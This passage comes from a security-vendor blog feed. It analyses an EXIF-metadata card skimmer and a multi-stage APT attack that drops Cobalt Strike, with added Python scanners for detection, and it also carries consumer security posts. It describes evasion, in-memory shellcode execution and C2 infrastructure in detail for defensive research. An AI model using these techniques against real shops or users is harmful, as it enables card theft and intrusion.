This is where things get interesting. We can see a field called ‘Copyright’ from which data is getting loaded. Attackers are using the Copyright metadata field of this image to load their web skimmer. Using an EXIF viewer, we can now see JavaScript code has been injected:

Figure 3: Metadata viewer revealing JavaScript code inside the Copyright tag

The abuse of image headers to hide malicious code is not new, but this is the first time we have witnessed it with a credit card skimmer.

The presence of an eval is a sign that code is meant to be executed. We can also see that the malware authors have obfuscated it. An archive of this script can be found here.

Figure 4: A portion of the malicious JavaScript hidden inside the EXIF data

Skimmer exfiltrates data as an image

The initial malicious JavaScript (Figure 2) loads the skimming portion of the code from the favicon.ico (Figure 3) using an <img> tag, and specifically via the onerror event.

As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address and credit card details. It encodes those using Base64 and then reverses that string.
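As an added, defender-side example (not code from the Malwarebytes post or from the skimmer toolkit), here is a stdlib-only Python scanner that walks a JPEG's marker segments, parses the EXIF IFD, pulls out the Copyright tag, and flags script tokens in it; it also undoes the Base64-then-reversed encoding the post describes for the exfiltrated form data. The images it builds are constructed test inputs, not the campaign's favicon, and the marker list is an assumption about what a notice should never contain.

```python
import base64
import re
import struct
from typing import Dict, Optional

COPYRIGHT_TAG = 0x8298   # TIFF/EXIF "Copyright" tag
ASCII_TYPE = 2           # TIFF field type for NUL-terminated ASCII
# Tokens that belong in script, not in a copyright notice (assumed heuristic).
SCRIPT_MARKERS = re.compile(
    r"\beval\s*\(|\bfunction\s*\(|document\.|\.onerror|XMLHttpRequest", re.I)


def build_exif_jpeg(copyright_text: bytes, byte_order: str = ">") -> bytes:
    """Build a minimal JPEG whose APP1/EXIF segment holds one IFD0 entry: Copyright.

    Constructed test input for this example, not the favicon from the campaign.
    byte_order is ">" for an 'MM' (Motorola) TIFF header or "<" for 'II' (Intel).
    """
    value = copyright_text + b"\x00"                  # ASCII values are NUL-terminated
    ifd_offset = 8                                    # IFD0 follows the 8-byte TIFF header
    data_offset = ifd_offset + 2 + 12 + 4             # count + one entry + next-IFD pointer
    if len(value) <= 4:                               # short values are stored inline
        entry_value, tail = value.ljust(4, b"\x00"), b""
    else:                                             # longer values live at an offset
        entry_value, tail = struct.pack(byte_order + "I", data_offset), value
    tiff = b"MM" if byte_order == ">" else b"II"
    tiff += struct.pack(byte_order + "HI", 42, ifd_offset)
    tiff += struct.pack(byte_order + "H", 1)          # one directory entry
    tiff += struct.pack(byte_order + "HHI", COPYRIGHT_TAG, ASCII_TYPE, len(value)) + entry_value
    tiff += struct.pack(byte_order + "I", 0)          # no next IFD
    tiff += tail
    app1_payload = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(app1_payload) + 2) + app1_payload
    return b"\xff\xd8" + app1 + b"\xff\xd9"           # SOI, APP1, EOI (no pixel data needed)


def _copyright_from_tiff(tiff: bytes) -> Optional[str]:
    """Read IFD0 of an embedded TIFF structure and return the Copyright string, if any."""
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd_offset = struct.unpack(order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(order + "H", tiff[ifd_offset:ifd_offset + 2])
    for i in range(count):
        entry = ifd_offset + 2 + 12 * i
        tag, typ, n, raw_value = struct.unpack(order + "HHI4s", tiff[entry:entry + 12])
        if tag != COPYRIGHT_TAG or typ != ASCII_TYPE:
            continue
        if n <= 4:
            data = raw_value[:n]
        else:
            (off,) = struct.unpack(order + "I", raw_value)
            data = tiff[off:off + n]
        return data.split(b"\x00", 1)[0].decode("latin-1")
    return None


def extract_exif_copyright(jpeg: bytes) -> Optional[str]:
    """Walk JPEG marker segments, locate APP1/EXIF and return the Copyright tag text."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                    # EOI or SOS: no more metadata
            break
        (seg_len,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        payload = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            return _copyright_from_tiff(payload[6:])
        pos += 2 + seg_len
    return None


def classify_copyright(text: Optional[str]) -> Dict[str, object]:
    """Flag a Copyright tag that carries script tokens or is far longer than a notice."""
    if text is None:
        return {"suspicious": False, "reason": "no Copyright tag"}
    markers = sorted({m.lower() for m in SCRIPT_MARKERS.findall(text)})
    if markers:
        return {"suspicious": True, "reason": "script tokens in Copyright: " + ", ".join(markers)}
    if len(text) > 256:
        return {"suspicious": True, "reason": "Copyright tag unusually long (%d bytes)" % len(text)}
    return {"suspicious": False, "reason": "looks like a plain notice"}


def decode_skimmer_payload(blob: str) -> str:
    """Undo the encoding the post describes: form data was Base64-encoded, then reversed."""
    return base64.b64decode(blob[::-1]).decode("utf-8")


if __name__ == "__main__":
    benign = build_exif_jpeg(b"Copyright 2020 Example Store")
    hostile = build_exif_jpeg(b"eval(function(p,a,c,k,e,d){return 0}(1))", "<")
    for name, img in (("benign", benign), ("hostile", hostile)):
        print(name, classify_copyright(extract_exif_copyright(img)))
    captured = base64.b64encode(b"name=Sample").decode()[::-1]   # constructed POST body
    print(decode_skimmer_payload(captured))
```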

Figure 5: Same code loaded via an img tag revealing how stolen data is exfiltrated

It comes with a twist though, as it sends the collected data as an image file, via a POST request, as seen below:

Figure 6: Example of a transaction that was grabbed by the skimmer

The threat actors probably decided to stick with the image theme to also conceal the exfiltrated data via the favicon.ico file.

Skimmer toolkit found in the open

We were able to get a copy of the skimmer toolkit’s source code which was zipped and exposed in the open directory of a compromised site. The gate.php file (also included in the zip) contains the skimmer’s entire logic, while other files are used as supporting libraries.

Figure 7: The skimmer toolkit, left on a hacked site and containing the PHP source files

This shows us how the favicon.ico file is crafted with the injected JavaScript inside of the Copyright field. There are some other interesting artifacts as well, such as the Cache HTTP header and Created date for the image.

Figure 8: PHP source showing how the EXIF data is injected

The JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library, in line with what we saw on the client-side.

Figure 9: WiseLoop PHP and JS obfuscator

Connections to other skimmers, Magecart group 9

Based on open source intelligence, we can find more details on how this skimmer may have evolved. An earlier version of this skimmer was found hosted at jqueryanalise[.]xyz (archive here). It lacks some obfuscation found in the more recent case we found, but the same core features, such as loading JavaScript via the Copyright field (metadata of an image file), exist.

Figure 10: Connecting skimmer domains and registrant emails

We also can connect this threat actor to another skimming script based on the registrant’s email (rotrnberg.s4715@gmail[.]com) for cddn[.]site. Two domains (cxizi[.]net and yzxi[.]net) share the same skimmer code which looks much more elaborate and does not appear to have much in common with the other two JavaScript pieces (archive here).

Figure 11: An artifact from the new skimmer

While debugging it, we can spot the string ‘ars’ within a URL path. That same string was seen being used in the first skimmer (see Figure), although it might very well just be a coincidence.

The data exfiltration is quite different too. While the content-type is an image again, this time we see a GET request where the stolen data is Base64 encoded only, and passed as a URL parameter instead.

Figure 12: Data exfiltration for this more advanced skimmer

Finally, this skimmer may have ties with Magecart Group 9. Security researcher @AffableKraut pointed out that a domain (magentorates[.]com) using this EXIF metadata skimming technique has the same Bulgarian host, same registrar, and was registered within a week of magerates[.]com.

Figure 13: A possible connection to Magecart group 9

Magerates[.]com is registered under, which also has other skimmer domains, and in particular several used via another clever evasion technique in the form of WebSockets. This type of skimmer was tied to Magecart Group 9, originally disclosed by Yonathan Klijnsma.

Tracking digital skimmers is not an easy task these days, as there are many threat actors and countless variations of skimming scripts based off toolkits or that are completely custom.

We continue to track and report skimmers in an effort to protect online shoppers from this campaign and dozens of others.

Indicators of Compromise

The post Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files appeared first on Malwarebytes Labs.

Coughing in the face of scammers: security tips for the 2020 tax season

Malware Bytes Security - Wed, 06/24/2020 - 10:30am

In spite of everything happening in the world right now—the 2020 tax season is about to come to an end, and taxes are due.

Americans got a reprieve back in March when the US Treasury Department and Internal Revenue Service (IRS) announced they were pushing back the federal income tax filing due date from April 15 to July 15, 2020. Fast forward three months and here we are, filing taxes during a worldwide health crisis and the most extreme social unrest the US has seen since the 1960s.

If only we could magically write off this entire year (like those Zoom calls with your therapist, aka “medical expenses”). And because time is relative, 2020 is absolutely the longest year in human history. Presidential election in November? I’ll die of old age before then.

While you’re preoccupied with, oh you know, avoiding serious illness and fighting for basic human rights, it’s business as usual for cybercriminals. Cybercrime tends to spike during tax season as scammers take advantage of all the valuable data floating around the Internet. These attacks follow a few tried and true methods, usually a phishing email or scam call from someone purporting to be from the IRS or an accountant offering to help you get a bigger refund.

This year, however, cybercriminals are exploiting the nation’s anxiety around COVID-19 and the increasingly grim economic outlook. The IRS has released multiple consumer alerts since shelter in place started back in March, warning Americans to be on the lookout for email and phone phishing attacks aimed at stealing refunds and Economic Impact Payments (EIP).

Beyond having your money stolen, tax ID theft can also damage your credit and cost you in time. It can take upwards of 600 hours to restore a stolen identity, according to the Identity Theft Resource Center.

Fortunately, protecting against the various tax season scams is relatively easy. All it takes is a little common sense and a basic understanding of the social engineering ploys scammers will try to use against you. With that said, here are some tried and true tips to help stay secure during this very unusual tax season.

For general tax preparedness

If you haven’t already filed, now’s the time to get a move on. Not only will you beat the rush, but you can ensure a faster return on your return. Mistakes, including those that can lead to identity theft, are made when you’re scrambling to dig up that charitable donation receipt from Goodwill five minutes before filing deadline.

Next, pick a preparer. Do your due diligence and check out any reviews or articles on tax software, if you plan to use it. Research online tax service providers to see how secure their systems are. Sites should have password standards, a lock-out feature that blocks users after too many unsuccessful login attempts, security questions, and email and/or text verification. If using an accountant, look for referrals. Remember that cheapest may not always be the best.

Finally, once you’ve filed, make sure to keep your tax returns someplace safe. If filing online, you’ll receive a massive PDF that you can download to your desktop. If someone were to access your computer a year from now, all that juicy information would be theirs for the taking. So be sure to either store it in an encrypted cloud service or put it on a removable drive, such as a USB. If filing on paper, keep your taxes in a locked file cabinet or drawer.

For online security

This is important for anyone transmitting sensitive data online, whether that’s shopping or filing taxes: be sure to use a connection that’s secure. If on a home computer and network, use password-protected Wi-Fi and look for properly-secured browsers (website URLs that start with “https” and display a small lock icon). Be sure your preparer has the same security in place. Never, ever, ever file your taxes using public Wi-Fi.


In addition, when filing taxes online (and again, this applies to any online service that requires a password), choose passwords that are long and complex. Avoid plain text passwords, use special characters, and if allowed, use spaces. We also highly recommend a password vault or manager that uses two-factor authentication.

The third pillar of Internet security (especially during tax season) is to be aware of social engineering scams, including phishing emails. A popular phishing technique is to send an email from the “IRS” that says, essentially, “We have your tax return ready and you can get your money faster if you just download this PDF!” Nope. Number one, you should never open an attachment from an email you aren’t expecting to receive. Number two, the IRS will not email you. They’ll physically mail you information, but even then, be wary. Tax scams can happen via postal mail, too.

In addition to phishing attacks, there are reports of cold callers who say, essentially, “Hey, we’re from the IRS and you owe us $10,000.” Nope. The IRS won’t call you either. If you receive an email or phone call that’s unsolicited and is looking for personal information, don’t give it. Go back and independently verify who is trying to reach you.

Since shelter in place started back in March, criminals have been using a variety of phishing scams relating to coronavirus. Be wary of any emails purporting to be from the IRS or otherwise, throwing around the terms “coronavirus,” “COVID-19,” and “stimulus.” Be especially wary of anyone claiming they can get you additional EIP money or a bigger refund.

After mastering the basics of online security, it’s a good idea to protect yourself using a little technology. Before you even start typing in your social security number, you should run at least one cybersecurity scan. That way, you’re sure there’s no malware on your system, such as a keylogger or spyware that can record your information without you knowing. You should also make sure your operating system, browser, and other software programs are updated—that way, you protect against malware that might exploit vulnerabilities in your computer.

Finally, if you believe there’s a chance you could have been compromised, look into free credit monitoring or ID theft services. (A caveat to this: Only use the free services, as paying for them is unnecessary and redundant with what credit card companies and banks are already doing.) By law, you are entitled to a free copy of your credit report from the major bureaus: Equifax, Experian, and TransUnion. In addition, there’s a lesser-known fourth bureau called Innovis that you can also use. Review your reports annually and look for any suspicious activity.

Filing early, being prepared, staying vigilant online, and employing the proper security technology—if you follow these tips then you can not only keep cybercriminals from cashing in on your tax returns but also from taxing your peace of mind.

The post Coughing in the face of scammers: security tips for the 2020 tax season appeared first on Malwarebytes Labs.

A zero-day guide for 2020: Recent attacks and advanced preventive techniques

Malware Bytes Security - Tue, 06/23/2020 - 11:00am

Zero-day vulnerabilities enable threat actors to take advantage of security blindspots. Typically, a zero-day attack involves the identification of zero-day vulnerabilities, creating relevant exploits, identifying vulnerable systems, and planning the attack. The next steps are infiltration and launch. 

This article examines three recent zero-day attacks, which targeted Microsoft, Internet Explorer, and Sophos. Finally, you will learn about four zero-day protection and prevention solutions—NGAV, EDR, IPsec, and network access controls. 

What is a zero-day vulnerability?

Zero-day vulnerabilities are critical threats that are not yet publicly disclosed or that are only discovered as the result of an attack. By definition, vendors and users do not yet know about the vulnerability. The term zero-day stems from the time the threat is discovered (day zero). From this day a race occurs between security teams and attackers to respectively patch or exploit the threat first. 

Anatomy of a zero-day attack

A zero-day attack occurs when criminals exploit a zero-day vulnerability. The timeline of a zero-day attack often includes the following steps. 

  1. Identifying vulnerabilities: Criminals test open source code and proprietary applications for vulnerabilities that have not yet been reported. Attackers may also turn to black markets to purchase information on vulnerabilities that are not yet public. 
  2. Creation of exploits: Attackers create a kit, script, or process that enables them to exploit the discovered vulnerability.
  3. Identifying vulnerable systems: Once an exploit is available, attackers begin looking for affected systems. This may involve using automated scanners, bots, or manual probing. 
  4. Planning the attack: The type of attack that a criminal wants to accomplish determines this step. If an attack is targeted, attackers typically carry out reconnaissance to reduce their chance of being caught and increase the chance of success. For general attacks, criminals are more likely to use phishing campaigns or bots to try to hit as many targets as quickly as possible.
  5. Infiltration and launch: If a vulnerability requires first infiltrating a system, attackers work to do so before deploying the exploit. However, if a vulnerability can be exploited to gain entry, the exploit is applied directly. 

Recent examples of attacks

Effectively preventing zero-day attacks is a significant challenge for any security team. These attacks come without warning and can bypass many security systems, particularly those relying on signature-based methods. To help improve your security and decrease your risk, you can start by learning about the types of attacks that have recently occurred.


In March 2020, Microsoft warned users of zero-day attacks exploiting two separate vulnerabilities. These vulnerabilities affected all supported Windows versions and no patch was expected until weeks later. There is not currently a CVE identifier for this vulnerability. 

The attacks targeted remote code execution (RCE) vulnerabilities in the Adobe Type Manager (ATM) library. This library is built into Windows to manage PostScript Type 1 fonts. The flaws in ATM enabled attackers to use malicious documents to remotely run scripts. The documents arrived through spam or were downloaded by unsuspecting users. When opened, or previewed with Windows File Explorer, the scripts would run, infecting user devices. 

Internet Explorer

Internet Explorer (IE), Microsoft’s legacy browser, is another recent source of zero-day attacks. This vulnerability (CVE-2020-0674) occurs due to a flaw in the way the IE scripting engine manages objects in memory. It affected IE v9-11.

Attackers are able to leverage this vulnerability by tricking users into visiting a website crafted to exploit the flaw. This can be accomplished through phishing emails or through redirection of links and server requests.


In April 2020, zero-day attacks were reported against Sophos’ XG firewall. These attacks attempted to exploit a SQL injection vulnerability (CVE-2020-12271) targeting the firewall’s built-in PostgreSQL database server.

If successfully exploited, this vulnerability would enable attackers to inject code into the database. This code could be used to modify firewall settings, granting access to systems or enabling the installation of malware. 

Protection and prevention

To properly defend against zero-day attacks, you need to layer advanced protections on top of your existing tools and strategies. Below are a few solutions and practices designed to help you detect and prevent unknown threats. 

Next-generation antivirus

Next-generation antivirus (NGAV) expands upon traditional antivirus. It does this by including features for machine learning, behavioral detection, and exploit mitigation. These features enable NGAV to detect malware even when there is no known signature or file hash (which traditional AV relies on). 

Additionally, these solutions are often cloud-based, enabling you to deploy tooling in isolation and at scale. This helps ensure that all of your devices are protected and that protections remain active even if devices are affected.

Endpoint detection and response

Endpoint detection and response (EDR) solutions provide visibility, monitoring, and automated protections to your endpoints. These solutions monitor all endpoint traffic and can use artificial intelligence to classify suspicious endpoint behaviors, such as frequent requests or connections from foreign IP addresses. These capabilities enable you to block threats regardless of the attack method. 

Additionally, EDR features can be used to track and monitor users or files. As long as the tracked aspect behaves within normal guidelines, no action is taken. However, as soon as behavior deviates, security teams can be alerted. 

These capabilities require no knowledge of specific threats. Instead, capabilities leverage threat intelligence to make generalized comparisons. This makes EDR effective against zero-day attacks. 

IP security

IP Security (IPsec) is a set of standard protocols defined by the Internet Engineering Task Force (IETF). It enables teams to apply data authentication measures, and to verify integrity and confidentiality between connection points. It also enables encryption and secure key management and exchange. 

You can use IPsec to authenticate and encrypt all of your network traffic. This enables you to secure connections and to quickly identify and respond to any non-network or suspicious traffic. These abilities enable you to increase the difficulty of exploiting zero-day vulnerabilities and decrease the chance that attacks are successful. 

Implement network access controls

Network access controls enable you to segment your networks in a highly granular way. This allows you to define exactly which users and devices can access your assets and through what means. This includes restricting access to only those devices and users with the appropriate security patches or tooling. 

Network access controls can help you ensure that your systems are protected without interfering with productivity or forcing complete restriction of external access, for example the type of access needed when you host software as a service (SaaS). 

These controls are beneficial for protecting against zero-day threats because they enable you to prevent lateral movement in your networks. This effectively isolates any damage a zero-day threat may cause. 

Staying safe

Recent zero-day attacks show that more and more threat actors find an easy mark in endpoint users. The zero-day attack on Microsoft exploited ATM vulnerabilities to trick users into opening malware. When threat actors exploited an Internet Explorer zero-day vulnerability, they tricked users into visiting malicious sites. The zero-day attack on Sophos could potentially grant user access to threat actors. 

However, while zero-day attacks are difficult to predict, it is possible to prevent and block these attacks. EDR security enables organizations to extend visibility into endpoints, and next-generation antivirus provides protection against malware without having to rely on known signatures. IPsec protocols enable organizations to authenticate and encrypt network traffic, and network access controls provide the tools to deny access to malicious actors. Don’t let threat actors have the upper hand. By utilizing and layering several of these tools and approaches, you can better protect your employees, your data, and your organization.

The post A zero-day guide for 2020: Recent attacks and advanced preventive techniques appeared first on Malwarebytes Labs.

Lock and Code S1Ep9: Strengthening and forgetting passwords with Matt Davey and Kyle Swank

Malware Bytes Security - Mon, 06/22/2020 - 11:00am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Matt Davey, chief operations optimist at 1Password, and Kyle Swank, a member of 1Password’s security team, about—what else—passwords.

We may know it’s important to have a strong, non-guessable, lengthy password, and yet we still probably all know someone who writes their password on a post-it, which is then affixed literally onto their machine. On today’s episode, we discuss secure passwords, password alternatives, and the future—and potential death—of passwords.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

  • End of Line: We look at what happens in a world where your expensive home devices can lose support without much warning
  • Facial recognition technology: We provide a rundown on which companies recently decided to not provide the technology to law enforcement.

Plus other cybersecurity news:

  • Business email compromise: scam email trends in the age of Coronavirus (Source: Help Net Security)

Stay safe, everyone!

The post Lock and Code S1Ep9: Strengthening and forgetting passwords with Matt Davey and Kyle Swank appeared first on Malwarebytes Labs.

Facial recognition: tech giants take a step back

Malware Bytes Security - Thu, 06/18/2020 - 11:30am

Last week, a few major tech companies informed the public that they will not provide facial recognition software to law enforcement. These companies are concerned about the way in which their technology might be used.

What happens when software that threatens our privacy falls into the hands of organizations that we no longer trust? In general, being aware of tracking software causes a feeling of being spied on and a feeling of insecurity. This insecurity that spreads throughout society is likely causing these companies to revise their strategy. Current developments surely have had an impact on an already distorted social environment. A pandemic and worldwide protests are a mix we have never experienced before in human history.

Definition of facial recognition

The definition of facial recognition, or “face recognition” as the Electronic Frontier Foundation (EFF) defines it, is:

A method of identifying or verifying the identity of an individual using their face. Face recognition systems can be used to identify people in photos, video, or in real-time.

Facial recognition is one of the technologies where even laymen can understand how it can be used against citizens by a malevolent or untrustworthy government. Other methods like social profiling and behavioral analysis are more elusive and less easy to comprehend.

In an earlier blog, we already discussed the very different rules, laws and regulations that exist around the world when it comes to facial recognition. Depending on the type of government and the state of technology, the rules are very different—or they don’t exist at all.

The stated bans by Amazon, IBM, and Microsoft announced over the course of one week, however, were more or less directly aimed at US organizations, perhaps as a result of a growing distrust about local law enforcement agencies in general and due to the behavior of some police departments in particular. But we can likely expect these bans to spread out across the world. (And I think that is a good thing.) Laws have a tendency to follow the developments in society, always trailing one step behind. But in this case it looks important enough to wait until the development and legislature can go hand in hand.

The companies

Microsoft halted the sale of facial recognition technology to law enforcement in the US, stating that the ban would stick until federal laws regulating the technology’s use were put into place. In other words, they want to have rules in place for the use of the technology before they provide it.

Amazon, which is potentially one of the biggest players in this space, has its own custom tech called Rekognition. It is licensed to businesses and law enforcement. Earlier on, Amazon had already announced a similar ban for very much the same reason, letting the public know that it would require “stronger regulations to govern the ethical use of facial recognition technology.”

IBM did not limit the ban to the US but it did explain their motives in a letter to Congress. In this letter the company addressed the subject by writing it had no plans to market facial recognition software if it would be used “for mass surveillance, racial profiling, violations of basic human rights and freedoms, or any purpose which is not consistent with our values and Principles of Trust and Transparency.”

Why we do not want facial recognition

Many groups, like the American Civil Liberties Union (ACLU) and the EFF, have objected to this technology, as using biometrics to track and identify individuals without their consent is considered a breach of privacy. Many feel that there is already more than enough technology out there that keeps track of our behavior, preferences, and movement. That technology does not necessarily always know who we are down to the level of personally identifiable information (PII), yet many people get uneasy when they find out how well aware advertisers and shops are of our preferences from tracking our browsing habits and online purchases.

And some incidents certainly don’t help the case at all. For example, the Baltimore police department reportedly ran social media photos through face recognition to identify protesters and arrest them.

Another example of this technology being used for a purpose other than the one it was intended for—and another possible reason for distrust—was the fact that Minnesota police resorted to what it called “contact tracing” of demonstrators arrested after recent protests. But “contact tracing” is a public health effort to help stop the spread of disease, like the COVID-19 outbreak. As it turns out, the Minnesota police are looking at it as a model for criminal investigations.

Facial recognition still has its limits

Another objection against facial recognition technology has always been the inaccuracy. There are significant risks that facial recognition used in law enforcement is unreliable.

Most facial recognition software relies on Artificial Intelligence (AI) and, more precisely, Machine Learning (ML). Where facial recognition relies on machine learning, the training data is often incomplete or unrepresentative of the general population. A study from MIT Media Lab shows that facial recognition technology performs differently across genders and races. In cases where misidentification can lead to arrest or incarceration, we will surely want to avoid such grave errors due to false positives.

Will we ever be ready for facial recognition to be used by law enforcement?

What surely will need to happen is that law enforcement regains the trust of the public in general and that laws regulating the use of facial recognition software will be made effective to satisfy the demands of the manufacturers of facial recognition software.

Whether that means we can lie back and rely on the forces at work to do the right thing is a whole other topic. A large majority of humanity seems to be torn between “I have nothing to hide” and “they already know everything” anyway. That is not a healthy situation and the degree of unease largely depends on which country you happen to live in and many other circumstances beyond your control.

So, even though the chances of facial recognition being widely used by law enforcement in the US seem to have diminished for now, this remains a topic to keep an eye on if you value your privacy.

The post Facial recognition: tech giants take a step back appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Multi-stage APT attack drops Cobalt Strike using Malleable C2 feature

Malware Bytes Security - Wed, 06/17/2020 - 1:30pm

This blog post was authored by Hossein Jazi and Jérôme Segura

On June 10, we found a malicious Word document disguised as a resume that uses template injection to drop a .Net loader. This is the first part of a multi-stage attack that we believe is associated with an APT group. In the last stage, the threat actors used Cobalt Strike’s Malleable C2 feature to download the final payload and perform C2 communications.

This attack is particularly clever for its evasion techniques. For instance, we observed an intentional delay in executing the payload from the malicious Word macro. The goal is not to compromise the victim right away, but instead to wait until they restart their machine. Additionally, by hiding shellcode within an innocuous JavaScript and loading it without touching the disk, this APT group can further thwart detection from security products.

Lure with delayed code execution

The lure document was probably distributed through spear phishing emails as a resume from a person allegedly named “Anadia Waleed.” At first, we believed it was targeting India but it is possible that the intended victims could be more widespread.

Figure 1: Resume

The malicious document uses template injection to download a remote template from the following url:


Figure 2: Template injection

The domain used to host the remote template was registered on February 29, 2020 by someone from Hong Kong. Creation time for the document is 15 days after this domain registration.
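To give the template-injection stage a concrete detection, here is an added example (written for this page; it is not code from Malwarebytes or from the sample analyzed) that opens a Word file as the ZIP container it is and flags any attachedTemplate relationship whose target is an external http(s) URL or UNC path. The remote-template URL of the real lure is not reproduced in this post, so the built-in sample uses the placeholder host template-host.example; only the file name indexa.dotm comes from the analysis above.

```python
"""Scan a Word OOXML document for remote template injection (added example)."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)


def find_remote_templates(doc_bytes):
    """Return one finding per attachedTemplate relationship whose target is remote.

    A benign document either has no attachedTemplate relationship or points it at
    a local .dotm; a URL or UNC path with TargetMode="External" is what makes Word
    fetch (and execute macros from) a template controlled by someone else.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # unparsable relationship part: out of scope for this check
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                scheme = urlsplit(target).scheme.lower()
                remote = external and (scheme in ("http", "https") or target.startswith("\\\\"))
                if remote:
                    findings.append({
                        "part": part,
                        "target": target,
                        "host": urlsplit(target).hostname or target,
                    })
    return findings


def build_sample_docx(template_target=None):
    """Build a minimal .docx in memory (constructed sample, not the lure from the post)."""
    rels = ['<?xml version="1.0" encoding="UTF-8"?>', '<Relationships xmlns="%s">' % REL_NS]
    if template_target:
        rels.append('<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
                    % (ATTACHED_TEMPLATE, template_target))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr("word/settings.xml", '<?xml version="1.0"?><settings/>')
        zf.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Scan the files given on the command line, or the constructed sample when none are given.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, find_remote_templates(fh.read()))
    else:
        # placeholder host; the post does not reproduce the real template URL
        sample = build_sample_docx("https://template-host.example/indexa.dotm")
        print(find_remote_templates(sample))
```

The scan looks only at the relationship type Word uses for attached templates, so a document that legitimately embeds pictures or hyperlinks from the web is not flagged; a UNC target is included because it can make Word leak NTLM credentials even when no macro runs.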

The downloaded template, “indexa.dotm”, has an embedded macro with five functions:

  • Document_Open
  • VBA_and_Replace
  • Base64Decode
  • ChangeFontSize
  • FileFolderExist

The following shows the function graph of the embedded macro.

Figure 3: Macro functions graph

The main function is Document_Open, which is executed upon opening the file. This function drops three files onto the victim’s machine:

  • Ecmd.exe: UserForm1 and UserForm2 contain two Base64 encoded payloads. Depending on the version of .Net framework installed on the victim’s machine, the content of UserForm1 (in case of .Net v3.5) or UserForm2 (other versions) is decoded and stored in “C:\ProgramData”.
  • cf.ini: The content of the “cf.ini” file is extracted from UserForm3 and is AES encrypted, which later on is decrypted by ecmd.exe.
  • ecmd.exe.lnk: This is a shortcut file for “ecmd.exe” and is created after Base64 decoding the content of UserForm4. This file is dropped in the Startup directory as a trigger and persistence mechanism.

Ecmd.exe is not executed until after the machine reboots.

Figure 4: Document_Open

Figure 5: Custom Base64 decode function

ChangeFontSize and VBA_and_Replace functions are not malicious and probably have been copied from public resources [1, 2] to mislead static scanners.

Intermediary loader

Ecmd.exe is a .Net executable that pretends to be an ESET command line utility. The following images show the binary’s certificate, debugger and version information.

The executable has been signed by “ESET, spol. s r.o.” and its version information shows that this is an “Eset command line interface” (Figure 6-8).

Figure 6: Certificate information

Figure 7: Version information

Figure 8: Debugger information

ecmd.exe is a small loader that decrypts and executes the AES-encrypted cf.ini file mentioned earlier. It checks the country of the victim’s machine by making an HTTP POST request to “”. It then parses the XML response and extracts the country code.

Figure 9: Getcon function: make HTTP POST request to “”

Figure 10: output

If the country code is “RU” or “US” it exits; otherwise it starts decrypting the content of “cf.ini” using a hard-coded key and IV pair.

Figure 10: ecmd.exe main function

The decrypted content is copied to an allocated memory region and executed as a new thread using VirtualAlloc and CreateThread APIs.

Figure 11: runn function

ShellCode (cf.ini)

A Malleable C2 is a way for an attacker to blend in command and control traffic (beacons between victim and server) with the goal of avoiding detection. A custom profile can be created for each target.

The shellcode uses the Cobalt Strike Malleable C2 feature with a jQuery Malleable C2 profile to download the second payload from “time.updateeset[.]com”.

Figure 12: Malleable C2 request

This technique has been used by two other recent Chinese APTs—Mustang Panda and APT41.

The shellcode first finds the address of ntdll.dll using the PEB and then calls LoadLibraryExA to load Wininet.dll. It then uses the InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA and HttpSendRequestA APIs to download the second payload. The API calls are resolved within two loops and then executed using a jump to the address of the resolved API call.

Figure 13: Building API calls

The malicious payload is downloaded by InternetReadFile and is copied to an allocated memory region.

Figure 14: InternetReadFile

Because the communication is over HTTPS, Wireshark is not helpful for spotting the malicious payload. Fiddler was not able to give us the payload either:

Figure 15: Fiddler output

Using Burp Suite proxy we were able to successfully verify and capture the correct payload downloaded from time.updateeset[.]com/jquery-3.3.1.slim.min.js. As can be seen in Figure 16, the payload is included in the jQuery script returned in the HTTP response:

Figure 16: Payload appended to the end of jQuery

After copying the payload into a buffer in memory, the shellcode jumps to the start of the buffer and continues execution. This includes sending continuous beaconing requests to “time.updateeset[.]com/jquery-3.3.1.min.js” and waiting for commands from the C2.

Figure 17: C2 communications
